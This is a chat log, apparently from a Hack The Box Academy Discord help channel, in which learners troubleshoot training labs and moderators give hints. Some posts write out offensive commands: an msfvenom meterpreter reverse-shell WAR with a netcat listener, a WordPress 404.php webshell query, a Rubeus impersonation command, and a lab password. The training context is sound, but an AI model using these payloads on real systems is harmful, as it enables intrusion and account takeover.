But I, for one, don't like having my hand held. It doesn't feel rewarding to solve something when you're just given the answer

HTB modules help build your methodology to arrive at the conclusion on your own, the Skill Assessments take the module information and sum it up in the assessments

i understand this

It also doesn't enforce good note taking, why take notes if you're just gonna be given the answer

Anyone else having issues with RDP on AD path machines ? Box has been up for 10 mins, cert is ignored and the command is the following :

xfreerdp3 /v:10.129.x.x /u:Administrator /p:'HTB_@cademy_adm!' /dynamic-resolution /cert:ignore

What is the issue/error?

15:06:46:703] [193240:0002f2e1] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5_parse_name (Configuration file does not specify default realm [-1765328160])
[15:06:46:703] [193240:0002f2e1] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5_parse_name (Configuration file does not specify default realm [-1765328160])
[15:06:46:942] [193240:0002f2e1] [ERROR][com.freerdp.core] - [nla_recv_pdu]: ERRCONNECT_LOGON_FAILURE [0x00020014]
[15:06:46:942] [193240:0002f2e1] [ERROR][com.freerdp.core.rdp] - [rdp_recv_callback_int][0x56070f099860]: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[15:06:46:942] [193240:0002f2e1] [ERROR][com.freerdp.core.rdp] - [rdp_recv_callback_int][0x56070f099860]: CONNECTION_STATE_NLA status STATE_RUN_FAILED [-1]
[15:06:46:942] [193240:0002f2e1] [ERROR][com.freerdp.core.transport] - [transport_check_fds]: transport_check_fds: transport->ReceiveCallback() - STATE_RUN_FAILED [-1]

specifying the domain does not help

Logon failure typically indicates that the username and/or password is incorrect

RDP to xxxx (ACADEMY-ADTRUST-CFSQL01) with user "Administrator" and password "HTB_@cademy_adm!"

I mean I can't do much more, this is far from the first time that I've had issues with RDP on this path. It's getting pretty tiring having to switch VPNs three times before accessing a lab

Reach out to support

Please am new how can I sign up to the academy

https://academy.hackthebox.com

Thanks

Well turns out you have to specify the domain in the username parameter (was not required in the previous envs), you might want to update the command supplied in the module material.

xfreerdp3 /v:10.129.x.x /u:Administrator@inlanefreight.ad /p:'HTB_@cademy_adm!' /dynamic-resolution /cert:ignore

Thanks for the support and great lab stability

It's gonna depend

Sometimes it's user@domain, sometimes it's domain/user iirc there's also /domain: for xfreerdp

out of 14 AD path modules that I've completed its the first time it happend

might be worth it to mention it somewhere or apply it everywhere so that people don't waste 20 mins trying to log into the machine

#1234357888114364508

Few things you can do here. I would enumerate MS01 with whatever creds will access it. Nothing super fancy, maybe just localgroups that might be worth enumerating and going from there. Netexec is also very helpful and if you are unfamiliar with it, they have a well written out wiki and I'm sure you can Google some helpful modules and techniques with netexec.

Your post contained spoiler info; alongside that it revealed other info related to the lab

: don't share flags, and info like that

oh dear I'm so sorry, I tried to redact almost everything, did I missed something?

Yes. Your copy/paste of the burp request

sorry then, I though I deleted enough. Do you maybe have a hint regarding my question, even if I failed to redact correctly

No idea. Could be that it's related to the User Agent

POST /keys.php HTTP/1.1
Host: 83.136.248.49:44095
User-Agent: curl/8.11.1
Connection: keep-alive
Content-Length: 26

key=as found

HTTP/1.1 200 OK
resulting with the *6e response

still no luck, curl also seems to have no other infos.

¯_(ツ)_/¯

solved it by using -x in curl, send it through BURP, reviewed it and found out, you need some correct headers, see below.

POST /keys.php HTTP/1.1
Host: 83.136.248.49:44095
User-Agent: curl/8.11.1
Accept: */*
Connection: keep-alive
Content-Length: 26
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

key=pssst

Oh yeah I forget that sometimes it forces the application content-type

correct played around and cut it down to at minimum

POST /keys.php HTTP/1.1
Host: 83.136.248.49:44095
Content-Type: application/x-www-form-urlencoded
Content-Length: 26

key=pssst still

Yeah, forgot that bit from the ffuf module, that POST data with php requires that header

Guys hello can anyone give me some tips how to communicate with SQL database have never done it before

hi guys

There's an sqli fundamentals module, and the footprinting and common services modules both give some basics

I am having trouble with DNS Tunneling with Dnscat2 section of Pivoting Tunneling and Port Forwarding module. My issue is I follow the exact instructions after installing the program they tell me to install to start the server and it won't let me it gives me this weird error. I don't think I can post code without revealing anything as its a short section.

I have not completed them and now passing attacking sql

Everything you need to interact has been given to you

It would probably spoil too much for me to post actual code. But I'm running the ruby script it tells me to run against the target host it won't let me.

it starts to run and runs into an error

It helps to provide the error dude

ok sure:

<SNIP>
/home/kali/dnscat2/server/libs/dnser.rb:828:in `bind': Cannot assign requested address - bind(2) for "10.129.42.198" port 53 (Errno::EADDRNOTAVAIL)
        from /home/kali/dnscat2/server/libs/dnser.rb:828:in `initialize'
        from /home/kali/dnscat2/server/tunnel_drivers/driver_dns.rb:251:in `new'
        from /home/kali/dnscat2/server/tunnel_drivers/driver_dns.rb:251:in `initialize'
        from /home/kali/dnscat2/server/tunnel_drivers/tunnel_drivers.rb:24:in `new'
        from /home/kali/dnscat2/server/tunnel_drivers/tunnel_drivers.rb:24:in `start'
        from dnscat2.rb:210:in `<main>'
                                             ```

I thought I installed it

there's an issue?

with installation? because the install script runs just fine

Address not available

but I can ping the address

Something else is running on port 53

With which database? Here are some examples
MySQL / MariaDB = mysql
MS SQL Server = sqsh
PostgreSQL = psql

For the communicator you need SQL
https://www.w3schools.com/sql/

Also bind

It's trying to bind to that address

Not connect

ok got it but what my web browser? I have nothing else running in the VM except the HTB Academy VPN and my firefox browser

¯_(ツ)_/¯

should my browser not be running?

Browser wouldn't be taking up 53

53 is dns

then I don't know what else is running

But the error may be more simplistic

I have HTB Academy's page open in the VM but ya ok

I have terminal

Try changing the bind address to your tun0 ip

it ran thanks

so the issue is I need my own device's IP since its a server

Yep

ok thanks I'll continue the section now

Reading the error and basic understanding is the key

The error states bind error

Hiya, I think the file upload assessment is slightly broken - when using burp it cannot load external assets for the website

Meaning it can't bind to the address

For example, when loading with foxyproxy active, going to burp

As a result, jquery won't load, and that is being used as the event listener for a POST request to trigger the file upload

Which results in me being unable to complete the lab

I've had no issues with the lab

If I try to use burp's built-in browser it throws an 'unknown SSL' issue

Could be your burp install

It looks like this, so something seems to be going on - not entirely sure how to resolve it

If that was the case, the burp browser would work with no setup, wouldn't it?

I've installed the certificate too (for both browsers I tested on)

Let me be more clear

It's the burp binary potentially

Not the cert

Hmm. I mean, I'm using it on my host platform right now

I'll try pwnbox rq

Pwnbox works, so it must be me. Odd

I must've done something wrong with the certificate, I guess

I get the server running on my attack box but I get errors on the Windows machine when I try connecting back to the DNS server I started. This is for DNS Tunneling with Dnscat2 section of pivoting tunneling and port forwarding:

<SNIP>                                                              Start-Dnscat2EncInit : Failed to negotiate encryption. Ensure your dnscat2 server is set up correctly.                  At C:\Users\htb-student\Desktop\dnscat2-powershell\dnscat2.ps1:1462 char:20                                             +         $Session = Start-Dnscat2EncInit $Session $False                                                               +                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                                                   + CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorException                                          + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Start-Dnscat2EncInit                                                                <SNIP>                                                          Start-Dnscat2EncInit : Failed to negotiate encryption. Ensure your dnscat2 server is set up correctly.                  At C:\Users\htb-student\Desktop\dnscat2-powershell\dnscat2.ps1:1462 char:20                                             +         $Session = Start-Dnscat2EncInit $Session $False                                                               +                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                                                   + CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorException                                          + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Start-Dnscat2EncInit    ```

I posted the errors. I snipped out the commands to avoid spoilers. This is what I'm running on powershell on hte local machine. I also tried similar commands on the local attack box and that won't work either.

this is for the step after I have started the DNS server and want to connect back to it.

Looks like a server side issue, you using the secret the server provided?

maybe. I'm gonna try this again later. I think once I'm well-rested this will be much easier.

I'm gonna try again tonight or tomorrow.

its probably something I will figure out once I am in a better state of mind. I just exercised so.

I'll try moving my brain to something else for the time being.

Where would be the best place to ask for clarification on the TOS when it comes to publicly discussing Academy content?

What do you need clarity on

Modules above tier 0 are 'paid content' so discussing specifics would be against ToS; obviously sharing answers directly is also against ToS

I have something in mind that involves a general description of a (not Tier 0) module's topic and the name of a used tool, no screenshots, solutions, walkthroughs or anything of that sort. Just want to compare the speed of PwnBox and KaliVM for a ffuf-fuzz, not gonna include the actual command, mostly just the final time stamp on how fast each of them are.

This gets fuzzy, because lots of things can impact those types of scans

yeah, it's not like a real benchmarking thing, just like a brain dump

I.e. your personal internet connection speed, isp, firewall, etc...

absolutely, that's kind of where I'm going with this, just have this example from Academy handy, might have to dig something out of a Tier 0 module if TOS is not clear on that

At the risk of sounding a bit harsh: what's the point. I.e. what's the reason you feel you need to ask/talk about it

Understandable. Well, I'm just trying to put my thought process out there.

But if it's for a blog, you'd have to use something from a t0 module

Roger that

https://help.hackthebox.com/en/articles/5188925-streaming-writeups-walkthrough-guidelines

yeah I have that open actually ^^

(I sometimes wonder that even for writeups. Does the world really need my clunky writeup for a machine if there's also ippsec 🥲 )

Consider if you have to reference the module, and you needing to refer to specifics within it, as a pseudo-writeup

More people doing writeups is a good thing. Different perspectives on the same issue

Well you need the writeup more than anyone. You can understand the lab in a deeper level that way

Lol yeah, same reason for my ffuf comparison. It's more to put those thoughts together for my own understanding. Not gonna make any revolutionary observations ^^

Also i appreciate you not taking my "what's the point" question as a dig at you

Just a general: if you're asking to do the thing, why

If you do need clarification on stuff: customerops@hackthebox.com <- support email

(It's preferred to open the ticket via the support buttons though)

Alrighty, thanks for y'alls input, I got some more clarity.
I'm just getting started (blog and stuff), I admit, it's a bit daunting and rough to get into if you're somewhat new to that industry

@pseudo pulsar this isn't a hacker4hire server

any fix for this

Google: "sliver null pointer armory"
https://github.com/BishopFox/sliver/issues/1614

it worked fine on my second laptop the problem was because i had old sliver on this vm

looks like it since the issue looks like it was resolved and is over a year old

i dont usually post here but I feel as if it's a nesscity

so it would appear as if 3389 is closed on the skills assesment for pivoting but it should be open as 53 is the only other port open

Making this module next to impossible with the ports I have been given

The last pivot?

||the .35 pivot||

near the beginning

Yeah then, there should be I think but i don’t think it was needed

I did it a few times and rdp only appeared a couple times

Oh? And why is that?

Is there another port open i am not seeing?

Yes

This is news to me because all the ports I can see are 53 and a closed rdp port

There are some other ways to get remote access

Hi all, I"m in Privilege Escalation Module in Introduction and having trouble escalating to User2. I found that User1 has sudo privileges for bin/bash. I've found the flag.txt file in /home/user2, but obviously don't have permissions to see it as User1. I've tried running multiple sudo command with with syntax sudo -u User2, including su'ing to user2, cat the file, create directory for .ssh under user2, and a bunch of others, but they all come back saying I don't have permissions, which I'm confused about since have sudo permissions for bin/bash for user2. Also, since I have sudo access to bash, I checked gtfobins for what I can do with that, and see I can do a reverse shell, file download etc. I tried opening a nc on the attacker box and then running the commands to do a file download on the box I'm trying to crack including setting the RHOST and RPORT and the LFILE and then running the bash command but nothing seems to happen. It also says that if bash is allowed to run as sudo, I should be able to access the file system, but having trouble figuring out how. Also, I found that the Linux system is a Ubuntu 20.04.1 LTS with sudo verison 1.8.31 which is vulnerable to CVE 2021-3156, which I downloaded to my attacker box and built it and then copied to the box I'm attacking, but when I try to run the exploit it says it requires a later version of glibc than what's on there. I downloaded glibc 2.34 which is what it says is required and copied it to the attacked box, but as user1, I can't install it because don't have permissions. Maybe I'm headed down completely wrong path, but could really use some pointers if I'm headed in right direction or completely off. Oh, also tried to create an .ssh directory for user2 so I could create and upload keys, but again, no permissions even using sudo -u user2. One last thing, I did run the linpeas checklist and it found some stuff but sadly no passwords

I just did a full nmap scan and found literally nothing, so you'll have to forgive my skeptism

dm

https://tenor.com/view/walloftext-gif-15779174454142966223

check the user1 sudo -l permissions again:
(user) /path/to/command means you can execute the /path/to/command as (user) via sudo; by default sudo tries as root, however you can supply it a user option

that's what I think I"m doing but must have something wrong. I'm running command 'sudo -u user2 cat flag.txt' and it tells me that user1 is not allowed to execute cat command

says not allowed to execute that command as user2, I mean

correct you're not allowed to use cat as user2

sudo -l explicitly tells you what binary you can run as user2 with sudo

which is /bin/bash, but I guess I don' t know what I can do with that is the issue, to be honest.

you're like 🤌 this close

sudo -u [username] /path/to/binary <whatever other arguments here, if any; bash is like cmd or powershell, when you run powershell or cmd from themselves, you start a new process with that binary and whatever other arguments you may have passed through

if you pass the -c argument -> it runs a subprocess that runs the command supplied, then exits back to your original shell

$$ is bash for [current proccess id]

run that; then just run /bin/bash then run it again, and note the change

congrats: you started a new shell process

and not working : (

thanks Marcie, that helps a ton..I should be able to get it from that..thanks!

glad to see someone else get their answer

sorry vader i'm not at my notes to help you; trying not to get carried away today, virtual job fair tomorrow so gotta be up early-ish

Did you already reset the env?

https://tenor.com/view/austin-powers-dr-evil-how-gif-19601238

this isn't a hacker4hire server and i suggest you not attempt to ping @ everyone like a petulent child

i got my pivot working\

Don't do things for the world, do it for yourself. You'd be surprsied at how much more you pick up when you try to blog about it.

Aw, thank you! yeah, I'll get over it and put something together. Learning by doing, eh?

Hi this isn't #general , get identified if you don't have access, instructions #welcome

Can someone explain to me why "username-anarchy" is used with CME in the "Password Cracking" module. Because when playing around i realised CME doesnt even confirm if a username exists, unless the correct password is also used with it

The status message is always "STATUS_LOGON_FAILURE", even if the username doesnt exist

alr

Because it still has a chance to get the right username and log you in if you do a simple password spray and not a brute for both user and pass

So is username-anarchy used to "generate ideas of usernames" rather than allow automating the process?

if you read the surrounding context to username-anarchy; it explains exactly what it's for

Its an automation of the username generation customised to a specific name

the module clear-cut explains this ^

Yeah I know why its exists, but i thought you could automate it with bash for purely validating usernames. but i guess you must also automate password spraying with the username so it will take longer

Could use a little nudge on Active Directory Assessment part 2. Do I need to use the PrintSpoofer exploit on the MSSQL server? Having an awful time trying to upload files via xp_commandshell

Yeah it’s kinda annoying but you should be fine if your port forwards are correct

Thank you for responding @tubbylattice! Im trying to upload the files directly from the jump box on the network

I tried a few different tools but didn't seem to have any write access. Jumpbox would show 200 ok, but no files would be written to the victim

In any case, am I on the right track by trying to use printspooler?

Full context: I got reverse shell via xp commandshell

Is it just me or is the connection to both the target machines and pwnboxes horrible ?

you shouldn't be using the pwnbox if you're using your own vm

then don't run the pwnbox; it uses the same connection file, which assigns the same internal network IP... I hope you see where that goes wrong from here

hi m stuck on WordPress hacking module skill assessment last question + 1 Obtain a shell on the system and submit the contents of the flag in the /home/erika directory.

what part?

last question of skill assessments

Obtain a shell on the system and submit the contents of the flag in the /home/erika directory.

i cange 404.php and add shell here but when i acess it it gave me nothing

/wp-content/themes/theme/404.php?cmd=ls

Ever hear the term: Don't reinvent the wheel

why automate something when the automation already exists

Hi,

Module: Windows Privilege Escalation
Section: Pillaging
Question: FInd out Grace's password

I have tried the for loop with the fasttrack.txt wordlist. But it doesn't match. I also tried rockyou.txt for a while before giving up :(. I don't like these kind of questions where it relies on bruteforce and me selecting the right word list 😭

The first and second question are interconnected, and within the section it is shown how you can recover the plaintext password without bruteforcing

Hi, Is it that I cannot use Academy VPN connection file "academy-regular.ovpn" to connect to the lab Machines?

Gotta use the lab vpns

https://help.hackthebox.com/en/articles/5185687-introduction-to-lab-access

Thanks for the nudge 💖, looks like I may have to just reset the box and try again ...

thanks

No its not that mate, I thought i could use the usernames generated by "username-anarchy" to spray with in CME to see if i can get valid usernames. But i discovered the error message was the same regardless if the user is correct or incorrect

So I modified my bash script to also attempt password cracking with all the users i put in the table. Its nothing in regards to the module, just creative thinking

Discovering users either need kerbrute or one user with ldap access

yeah, I just had an idea and was trying to play with it. Nothing wrong with having lil fun

See: AD enum and Attacks module

Just dont have too much fun and confuse yourself

Well making mistakes and trying to see the limits of a tool is the fastest way to learn

but yeah lol dw

Yooo

I need help

https://tenor.com/view/waiting-hurry-impatient-gif-22696825

Hi

How do I learn hacking

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Hi
Can someone explain to me how to solve HTTP Response Splitting? I found XSS, but I have no idea how to steal the admin cookie and how to deliver it to him

is there a way to get rid of the maintenance notification? it makes the integrated terminal buttons inaccessible?
and that cube that is for reporting stuff?

because i use the website sort of zoomed in and it takes up so much space

I used netxec too in order to dump the SAM database, but same problem (lack of privilege)

hi @everyone does anyone know where i can get help with an issue that im battleing?? its about WPA/WPA2 wifi networks "PEAP relay attack" thnx!

yoo

hi

my logo is cool and name ha

Anyone else having performance issues on password attack module?

Without revealing much of the answer, I got onto the ||svc_workstations|| user via SSH, but cannot seem to sudo su to root from there.. getting the following error

hi
can someone help me
i have a problem when i was doing cross site scripting in htb
so i was at topic session hijacking
and i do everything got a cookie
but the problem is
that in login page in storage there is no options about cookies
maybe i will try just restart a target

same problem

in the developer tools you need to click the + sign at the top right han side, if youre using firefox it goes through the steps in the module.

thank you I was not paying attention so much

i think i will pay attention more

no problem! Took me a hot minute to get it

You can stay logged in and simply change the session cookie and refresh

Ping fail!

Hey, is anyone able to give me some suggestions regarding how to improve RDP performance. Im completing the Windows Attack and defense module, specifically the 'PKI - ESC1' exercise. Having to RDP to the Kali machine and then RDP to the windows machine makes the exercise impossible due to lag.
I am connecting using the VPN (tried both UDP and TCP) with a local version of PARROTOS (not using a VM).

Based in Australia, so im guessing that it may just be a matter of server location.

You're going in the right direction. You can DM.

Also refrain from sharing content that can be considered spoilers, i.e,, privileges of users.

HI

I am interested to learn hacking

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@whole olive ^

Thank you very much

anyone faced issues in using psexec with proxychains in the Sliver module? 🫠

what kind of issues

can somebody help me with the windows attacks & defense module.

i am trying to perform a kerberosting attack

i am able to connect to the windows machine using RDP but when i try to do the same with the kali linux VM it wont work. Should i be doing anything differently?

not connecting at all

it keeps hanging at "uploading file"

also i have a question of smth im not fully understanding in it, may i DM u?

go for it

I have a question regarding DNS. I looked up and read that most request made to a DNS is still in plaintext. How is that not an issue? I mean you can just see the activity of the requests made but still. Isn't it basically your entire browsing history being tracked if someone know how to snoop in?

the request is generally "does x exist" not the actual full body of the text/request

So it just shows if I am contacting the particular site?

yes; it would be a PITA if the request to say "does x exist" would need to be encrypted/decrypted

considering it would need a massive overhaul of existing infrastructure to actually implement

So VPNS and encrypted DNS mask those requests too right?

no

at least not entirely

VPNs shift the point of trust

and encrypted DNS only works if the DNS server you're contacting are utilizing DNS over TLS

Clears a lot of things. Thanks a lot 🙂

have a problem when I was learning metasploit in htb
so when i was doing section payloads I need use apacher druid exploit and when i use it i got this
msf6 exploit(linux/http/apache_druid_js_rce) > exploit
[] Started reverse TCP handler on PWNIP:4444
[] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8080).
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/apache_druid_js_rce) >

Hi! I have a question about the module "Constrained Delegation Overview & Attacking from Windows"

The module tells without any further explanation that we can use HTTP as the alternative service:
.\rubeus.exe ... /altservice:HTTP
It also links a microsoft page with other common service names. I tried a couple of them (fax, cifs, replication) and none worked.

Can anyone tell me how can I see that the HTTP can be abused or present at all?

The error message is pretty clear. Something else is already running on your port 8080 and metasploit can't use it to host the actual payload. Either stop whatever is running on that port or change SRVPORT to another value.

wow i forget that burpsuite is working

thank you

hello friends

https://academy.hackthebox.com/module/112/section/1246

in the MSSQL section of the Footprinting module, i'm confused for the question here:

Connect to the MSSQL instance running on the target using the account (backdoor:Password1), then list the non-default database present on the server.

i connected using mssqlclient.py but i'm confused by the question. what am i looking for exactly

The name of the database that is not there by default (the section has a list)

i was putting in the name of the Owner... instead of the name of the database. that was my mistake

it happens

Hello,
i have been working on DACLII skill assessment question "Abuse taino's rights to compromise SDE01 and read the flag located at C:\Users\Administrator\Desktop\flag.txt". I have found the right path but got stuck on the command for the impersonation ".\Rubeus.exe s4u /domain:inlanefreight.local /user:DB2000 /rc4:[Missing] /impersonateuser:administrator /msdsspn:"MSSQLSvc/db2000" /nowrap" i can't get the RC4 for DB2000. Would be nice if anyone could give a hint please.

Hello, I need some help. I'm stuck in this part of the section, Active Directory Enumeration & Attacks (Attacking Domain Trusts - Child -> Parent Trusts - from Linux) with this question "Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer. ". I can't find the user's bross ! , I tried on windows but nothing ! . Please any idea and Hits will help me.

https://academy.hackthebox.com/module/143/section/1508

help

https://academy.hackthebox.com/module/57/section/516

What is the question?

What is the username of the ftp user you find via brute-forcing? ( i scanned the target ip but the ftp port was closed on it ....so is it possible to brute-force)

Is this an ip:port?

If so: the only scope is the port given, and that will be ftp

ip:port is given i scanned the ip:port the port is on ssh

Ah I see the problem

The assessments are directly tied

A leads to B

Ssh in from the skill assessment 1, and perform the enumeration as detailed in one of the sections in the module

@steel arch ; this is your launch platform

After that you'd run the internal scan for services

i have finished the firstone

The blurb tells you what you need to do first then 😉

Hello, I need some help. I'm stuck in this part of the section, Active Directory Enumeration & Attacks (Attacking Domain Trusts - Child -> Parent Trusts - from Linux) with this question "Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer. ". I can't find the user's bross ! , I tried on windows but nothing ! . Please any idea and Hits will help me.

Still 2 years after not fixed... 😅

Hello I need help

I'm in the cracking in to htb module

2 course

in skills assessment

I dont get the same privileges. help please

msfvenom -p java/meterpreter/reverse_tcp LHOST=10.10.15.147 LPORT=9443 -f war -o maliciou.war
Payload size: 6210 bytes
Final size of war file: 6210 bytes
Saved as: maliciou.war
┌─[us-academy-2]─[10.10.15.147]─[htb-ac-1719859@htb-lpaf7th7l0]─[~]
└──╼ [★]$ nc -lvnp 9443
listening on [any] 9443 ...
connect to [10.10.15.147] from (UNKNOWN) [10.129.22.85] 41214
whoami
java.lang.OutOfMemoryError: Java heap space┌─[us-academy-2]─[10.10.15.147]─[htb-ac-1719859@htb-lpaf7th7l0]─[~]
└──╼ [★]$ nc -lvnp 9443
listening on [any] 9443 ...
connect to [10.10.15.147] from (UNKNOWN) [10.129.22.85] 41254
whoami
java.lang.OutOfMemoryError: Java heap space┌─[us-academy-2]─[10.10.15.147]─[htb-ac-1719859@htb-lpaf7th7l0]─[~]
└──╼ [★]$ nc -lvnp 9443
listening on [any] 9443 ...
connect to [10.10.15.147] from (UNKNOWN) [10.129.91.194] 36956
id
ls
java.lang.OutOfMemoryError: Java heap space```

restart machine same error. 😭 
https://academy.hackthebox.com/module/51/section/480
why connection breaks each time.

Can someone explain me the price differences between subscriptions and only cubes?

If you want to buy single modules cubes are ok if you want to unlock all modules annual subscription is ok if you want to complete several paths sometimes other methods of subscriptions are worth being considered.

There are monthly and annual modules

I am asking, because if I get a monthly subscription, I get modules, cubes and extras

The cubes are permanent, right? Until I waste them

And the subscription is cheaper, while the cubes themselves are more expensive

There are different types of subscriptions. One will unlock modules (I believe up to tier 2) while other subscriptions just give you cubes.

If you don't get a subscription that auto-unlocks modules then you'll need to unlock them with cubes instead.

Im talking about the gold subscription

Oh wait so annual and monthly are different in terms of access?

Or they are the same

There is some specific abuse before you get to this point that you can perform. I wouldn't rely solely on BH results and ensure you are enumerating things thoroughly. Think back to the various methods you can use to obtain an NT hash and see if any work with what you have enumerated. I know that's super vague, so if you still can't seem to get going in the right direction, you can DM.

I am at win enum section in pentest in a nutshell module. These are the privileges I have to have. Am I missing something? I used the same credentials (john, supersecurepass123)

Did you open as admin?

ofc not, why would I, am superuser loool... i am supersarcastic noob 🙂
but now, when I do as admin I get:

Hi.

Any tips finding the flag.txt in Login Brute Forcing PT2, I found the user and I'm inside the SSH server.
But no flag to be found, unless I'm drunk.

The user I'm finding T**, is a ftp user, but no FTP port open.
Unless it's really high up 😛

I suggest revisiting the section that is similar to your situation. It's covered.

But I'm already inside the SSH, unsure what section shows me how to find the flag.txt the smartest. Already ran though the files and folders

I'm sure one of the sections covers local stuff.

Okay I see where you are trying to point me maybe! I'll have a look thanks!

If you are still stuck after trying some things out, you can DM.

I'll read the entire login brute force chapters again for hints 😄

Your tips pointed me the right direction, finished it

thanks man!

Np. Be sure to add that stuff to your notes.

Already expanded my SSH notes to make sure I don't miss! 😄

Question! When I'm running medusa inside an SSH, does it require the target to have it, or does it use my local instance?

Yeah it's not something that is going to generally be installed on a target, unless you pwn a pentest rig or it's just on it. Enumeration is always key throughout your process.

So on targets in this world, but real world not gotcha. 😄

Would be nice to leverage locale instance to do it

Anything is possible. Like I said enumerate and see what type of living off the land you can do.

Gotta improve that part next for sure!

There are other ways you could do it, but that's outside the scope of the module.

Any module you can recommend ? I'm doing the Basic Toolset currently

The path that is, so all the modules in it

hey guys if someone solved white box attack module is there problem in the bot in ```Client-Side Prototype Pollution

hello im having trouble with:
https://academy.hackthebox.com/module/136/section/1288
File Upload Attacks - Blacklist Filters

Try to find an extension that is not blacklisted and can execute PHP code on the web server, and use it to read "/flag.txt"

I can get extensions that upload successfully but when I view their corresponding page my php is only reflected on the page, I am not able to execute commands via url.

I am stuck on the "Brute-Forcing 2FA Codes" section from the Broken authentication module. It seems to accept every 2FA code when I execute the ffuf command (and I made sure I was using the correct PHPSSID cookie from the otp page of my IP address)

https://academy.hackthebox.com/module/80/section/777

Use an extension list to fuzz for extensions that give different error messages

Then you can also fuzz the file upload and the command execution checking

Hi everyone. I'm having trouble with the Pivoting, Tunneling, and Port Forwarding Meterpreter Tunneling & Port Forwarding lab 2nd question. I've followed the instructions, but metasploit never recognize my session. I tried reaching helpdesk, but they say it's working. I can't use autoroute because metasploit says that there is no session after exploiting the initial ubuntu machine no matter what I attempt to do.

you ran sessions -i 1?

yes. It continues to show no active sessions.

Did you exit the shell session you popped or background it

:) (sounds like you closed it)

Hi. Yes. I tried it four times and still the same issue

If you closed it -> you won't see the session... because it closed

I can clearly see I have a meterpreter session from the ubuntu box, but metasploit doesn't see it as an active session I'm in

That only works if the exploit worked on first try/this was the first session

sessions -l iirc to list sessions

Is there a way to drop screenshots?

Also are you running a different instance of metasploit?

If so: that's your issue

The new process can't see your other one

Just 1 instance of metsaploit, but I'll try it again

What do you mean you can "clearly see;" also for embed perms you need to follow the instructions in #welcome and link your htb account

If I could add a screenshot it will better explain. I'm just going to go over the lab again

Well i told you how to be able to share screenshots

It's linked to the embed permission

I linked my HTB accont

couldn't find the upload a file button my bad

I don’t think you can keep that session in metaplsoit unless you configure some other stuff

Has to be from the same session

I'll double back and do it that way

didn’t marcielee say that?

gonna ask this again - does anyone still have an account logged in to academy without the use of sso? I'm also looking for someone who has an account that logged in to academy via sso that had earlier logged in via the old login page, since I probably won't find the first

I did

SSO is tied to the login, they aren't separate - and haven't been for some time

All accounts using the old method were migrated to an SSO Account

you'd be surprised

I'm currently at where setup socks proxy module in metasploit and started the proxy server. I opened another msfconsole just to see if it shows a session and it doesn't.

If you have a question regarding this, reach out to support

Because the new msfconsole won't be able to see it

As i stated earlier

support would probably not know, and if they did, they might patch it

?? Well I'm not sure what you're question is tbqh

HAng on. Weird it works now. My F-up. Thanks for all you're help!

. Here's where I told you this earlier

I just can't see the difference...I'm trying to fuzz a username with ffuf, and what looks like the exact same command to me (aside from the different location of the wordlist), it works only on PwnBox, not on Kali. PwnBox spits out the desired username after a few iterations, Kali seems to show me valid response statuses for literally every name in the list?
It's gotta be a typo somewhere, and I'm just not seeing it?

Jeez, that took me way too long. "www-forum-urlencoded" instead of form on Kali

Nvm, I"m all good

You can DM if you are still stuck.

Although, while I'm on that topic; when enumerating with PwnBox, I get all those "Progress" outputs in the terminal, which make the actual results kinda hard to see. Kali shows me just the found usernames.
Again, seemingly identical command, why the different behavior of ffuf?

it's probably some shell thing

Full screen

Only had that on whatever that parrot terminal is

YES! Thank you!

much better 🤓

you can probably fix it with stty

gonna look into that, thanks!

do a stty -a

that might take me a minute 🙈

Hello, I need some help. I'm stuck in this part of the section, Active Directory Enumeration & Attacks (Attacking Domain Trusts - Child -> Parent Trusts - from Linux) with this question "Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer. ". I can't find the user's bross ! , I tried on windows but nothing ! . Please any idea and Hits will help me.

https://academy.hackthebox.com/module/143/section/1508

Are you connecting to the right domain?

it looks fine

shell stuff is kind of magic though, so it's probably easier to just use a full screen

let me check again

yeah, I can absolutely live with that

LOGISTICS.INLANEFREIGHT.LOCAL

Dm the command

when you see it loooooooooool, guess the module 😄

hi

i want to learn hacking

@whole olive you have already been given a URL that points you to the resource

httb verb one? web attacks one?

Oh ok

oh ok

Hi, it's my first post so i hope in correct section.
I have to do this task

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths (https://www.inlanefreight.com/directory" or "/another/directory") of that domain. Submit the number of these paths as the answer.

I have problem or i am doing something wrong.
I am trying use curl -s [address] > site.html and nothing. I had to try ping but it failed.

I'm going at this the wrong way or what?

are you able to curl other sites? try curl google.com

I will try tommorow. I reached my limit Pwnbox today.

Off Topic: what is better (buy cheap /use old) laptop and install linux or VM with Linux?

Hey, I'm doing this password mutations in password attacks and the ssh bruteforce is taking forever

Hey

Pwnbox not opening. Can anyone help?

can i DM anyone regarding Sliver module Skill Assessment?

any good open source note ?

like this https://docs.h4rithd.com/

so i can make my own modification on it . (i use hacktricks note but it not comparable with obsidian)

Sure

hey, i cant access the lab for CRUD API in Web Requests module, anyone can help?

I have been using cherry tree

can somebody tell me what the response here should be?
its from https://academy.hackthebox.com/module/80/section/767

i tried: 2FA, OTP, reset tokens, tokens

nothing

The answer is in the question itself.

You can here or you can DM.

It all depends on you current laptop. If it's only 6 RAM or so then running VM will be painful

ah right didnt see that

